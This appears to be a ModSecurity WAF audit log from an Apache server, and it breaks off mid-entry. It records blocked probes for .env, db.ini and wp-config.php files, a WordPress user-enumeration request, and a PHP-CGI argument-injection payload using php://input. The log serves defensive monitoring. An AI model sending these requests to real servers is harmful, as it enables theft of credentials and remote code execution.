Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4386f56c-Z-- --81545d19-A-- [28/Apr/2025:23:15:35 +0700] aA-pp8JruAEpaSEZ7DBTagAAAAo 103.236.140.4 35590 103.236.140.4 8181 --81545d19-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; HMA-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --81545d19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81545d19-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745856935019683 886 (- - -) Stopwatch2: 1745856935019683 886; combined=418, p1=309, p2=0, p3=0, p4=0, p5=109, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81545d19-Z-- --822a3520-A-- [28/Apr/2025:23:34:07 +0700] aA-t_4_5LpLtj_OTfS9nswAAAMg 103.236.140.4 40212 103.236.140.4 8181 --822a3520-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 172.94.10.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 172.94.10.14 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --822a3520-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --822a3520-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745858047909378 2921 (- - -) Stopwatch2: 1745858047909378 2921; combined=1353, p1=462, p2=862, p3=0, p4=0, p5=29, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --822a3520-Z-- --058b232d-A-- [28/Apr/2025:23:57:51 +0700] aA-zj1T4soy9XydcuKYm8AAAAEs 103.236.140.4 45990 103.236.140.4 8181 --058b232d-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --058b232d-C-- --058b232d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --058b232d-E-- --058b232d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745859471431128 3814 (- - -) Stopwatch2: 1745859471431128 3814; combined=2492, p1=446, p2=2015, p3=0, p4=0, p5=30, sr=70, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --058b232d-Z-- --24e7f335-A-- [29/Apr/2025:00:18:29 +0700] aA-4ZWj1i6BJZll4jGM7pAAAAIs 103.236.140.4 51056 103.236.140.4 8181 --24e7f335-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Googlebot-Video/1.0 Accept-Charset: utf-8 --24e7f335-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --24e7f335-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745860709892541 821 (- - -) Stopwatch2: 1745860709892541 821; combined=318, p1=262, p2=0, p3=0, p4=0, p5=55, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24e7f335-Z-- --75639e31-A-- [29/Apr/2025:00:18:50 +0700] aA-4emj1i6BJZll4jGM7sQAAAIo 103.236.140.4 51146 103.236.140.4 8181 --75639e31-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3803.0 Safari/537.36 Edg/76.0.174.0 Accept-Charset: utf-8 --75639e31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75639e31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745860730046585 756 (- - -) Stopwatch2: 1745860730046585 756; combined=299, p1=263, p2=0, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75639e31-Z-- --d4b67a1e-A-- [29/Apr/2025:00:32:02 +0700] aA-7ko_5LpLtj_OTfS9rPAAAAME 103.236.140.4 54326 103.236.140.4 8181 --d4b67a1e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; GT-P5210 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Accept-Charset: utf-8 --d4b67a1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4b67a1e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745861522897924 817 (- - -) Stopwatch2: 1745861522897924 817; combined=339, p1=304, p2=0, p3=0, p4=0, p5=35, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4b67a1e-Z-- --a5826563-A-- [29/Apr/2025:00:32:11 +0700] aA-7m8JruAEpaSEZ7DBYjgAAAAs 103.236.140.4 54360 103.236.140.4 8181 --a5826563-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14 Accept-Charset: utf-8 --a5826563-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5826563-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745861531331609 758 (- - -) Stopwatch2: 1745861531331609 758; combined=300, p1=263, p2=0, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5826563-Z-- --43cc986c-A-- [29/Apr/2025:01:37:12 +0700] aA_K2Gj1i6BJZll4jGNSCwAAAIU 103.236.140.4 39778 103.236.140.4 8181 --43cc986c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 194.163.159.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 194.163.159.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; GM1910) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --43cc986c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43cc986c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745865432239578 733 (- - -) Stopwatch2: 1745865432239578 733; combined=296, p1=263, p2=0, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43cc986c-Z-- --18dedc51-A-- [29/Apr/2025:01:37:30 +0700] aA_K6lT4soy9XydcuKY_pAAAAEw 103.236.140.4 40440 103.236.140.4 8181 --18dedc51-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 194.163.159.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 194.163.159.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 Accept-Charset: utf-8 --18dedc51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18dedc51-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745865450682280 948 (- - -) Stopwatch2: 1745865450682280 948; combined=440, p1=392, p2=0, p3=0, p4=0, p5=48, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18dedc51-Z-- --f8d20645-A-- [29/Apr/2025:01:46:39 +0700] aA_ND1T4soy9XydcuKZD7QAAAFY 103.236.140.4 59652 103.236.140.4 8181 --f8d20645-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0) EudoraWeb 2.1 Accept-Charset: utf-8 --f8d20645-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8d20645-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745865999133168 762 (- - -) Stopwatch2: 1745865999133168 762; combined=335, p1=300, p2=0, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8d20645-Z-- --67f14c1a-A-- [29/Apr/2025:03:41:52 +0700] aA_oEI_5LpLtj_OTfS-l8wAAAMI 103.236.140.4 41708 103.236.140.4 8181 --67f14c1a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --67f14c1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --67f14c1a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745872912730168 820 (- - -) Stopwatch2: 1745872912730168 820; combined=368, p1=327, p2=0, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67f14c1a-Z-- --0b076c6a-A-- [29/Apr/2025:03:49:41 +0700] aA_p5QW3ctMdWeqW3LOhJAAAAFA 103.236.140.4 47816 103.236.140.4 8181 --0b076c6a-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0b076c6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b076c6a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873381523784 1299 (- - -) Stopwatch2: 1745873381523784 1299; combined=568, p1=528, p2=0, p3=0, p4=0, p5=40, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b076c6a-Z-- --f0ad395d-A-- [29/Apr/2025:03:49:41 +0700] aA_p5cDCAfZpkPvVAPOdBQAAAI0 103.236.140.4 47818 103.236.140.4 8181 --f0ad395d-B-- GET /config/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --f0ad395d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0ad395d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873381726131 876 (- - -) Stopwatch2: 1745873381726131 876; combined=380, p1=343, p2=0, p3=0, p4=0, p5=36, sr=132, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0ad395d-Z-- --3c3dff24-A-- [29/Apr/2025:03:49:41 +0700] aA_p5cDCAfZpkPvVAPOdBgAAAI4 103.236.140.4 47820 103.236.140.4 8181 --3c3dff24-B-- GET /.env.production HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --3c3dff24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c3dff24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873381935543 673 (- - -) Stopwatch2: 1745873381935543 673; combined=290, p1=259, p2=0, p3=0, p4=0, p5=31, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c3dff24-Z-- --f764235b-A-- [29/Apr/2025:03:49:42 +0700] aA_p5sDCAfZpkPvVAPOdCAAAAJM 103.236.140.4 47826 103.236.140.4 8181 --f764235b-B-- GET /api/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --f764235b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f764235b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873382137830 824 (- - -) Stopwatch2: 1745873382137830 824; combined=355, p1=321, p2=0, p3=0, p4=0, p5=34, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f764235b-Z-- --421af865-A-- [29/Apr/2025:03:49:42 +0700] aA_p5sDCAfZpkPvVAPOdCQAAAJA 103.236.140.4 47828 103.236.140.4 8181 --421af865-B-- GET /settings/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --421af865-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --421af865-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873382345477 681 (- - -) Stopwatch2: 1745873382345477 681; combined=300, p1=269, p2=0, p3=0, p4=0, p5=31, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --421af865-Z-- --39929a3e-A-- [29/Apr/2025:03:49:44 +0700] aA_p6MDCAfZpkPvVAPOdEQAAAII 103.236.140.4 47848 103.236.140.4 8181 --39929a3e-B-- GET /db.ini HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --39929a3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39929a3e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873384425530 2372 (- - -) Stopwatch2: 1745873384425530 2372; combined=877, p1=395, p2=453, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39929a3e-Z-- --50097b7c-A-- [29/Apr/2025:03:49:48 +0700] aA_p7MDCAfZpkPvVAPOdHQAAAJI 103.236.140.4 47884 103.236.140.4 8181 --50097b7c-B-- GET /docker/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --50097b7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --50097b7c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873388242097 687 (- - -) Stopwatch2: 1745873388242097 687; combined=281, p1=248, p2=0, p3=0, p4=0, p5=33, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50097b7c-Z-- --aaf5eb6a-A-- [29/Apr/2025:03:49:48 +0700] aA_p7AW3ctMdWeqW3LOhKAAAAFY 103.236.140.4 47890 103.236.140.4 8181 --aaf5eb6a-B-- GET /wp-config.php HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --aaf5eb6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aaf5eb6a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873388438059 1018 (- - -) Stopwatch2: 1745873388438059 1018; combined=372, p1=334, p2=0, p3=0, p4=0, p5=38, sr=89, sw=0, 